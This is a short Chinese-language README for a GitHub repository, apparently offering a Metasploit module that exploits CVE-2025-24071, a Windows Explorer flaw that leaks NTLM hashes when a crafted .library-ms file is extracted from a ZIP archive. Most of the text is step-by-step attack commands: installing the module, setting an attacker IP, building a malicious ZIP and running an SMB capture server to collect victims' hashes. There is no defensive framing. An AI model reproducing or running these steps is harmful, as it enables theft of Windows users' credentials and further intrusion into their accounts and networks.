该仓库包含一个 Metasploit 模块,用于利用 CVE-2025-24071 漏洞。这是 Windows 资源管理器中的一个漏洞,当从 ZIP 存档中提取恶意的 .library-ms 文件时,会泄露 NTLM 哈希。
开发者:FOLKS-IWD
当用户提取包含特制 .library-ms 文件的 ZIP 存档时,漏洞便会触发。Windows 资源管理器会自动向文件中指定的远程服务器发起 SMB 身份验证请求,从而在无需用户交互的情况下泄露用户的 NTLM 哈希。
该 Metasploit 模块:
.library-ms 文件。
git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
cd CVE-2025-24071-msfvenom
cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
use auxiliary/server/ntlm_hash_leak
set ATTACKER_IP 192.168.1.162 # 替换为你的 IP 地址
set FILENAME exploit.zip # 恶意 ZIP 文件的名称
set LIBRARY_NAME malicious.library-ms # .library-ms 文件的名称
set SHARE_NAME shared # SMB 共享名称
run
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162 # 与 ATTACKER_IP 相同
run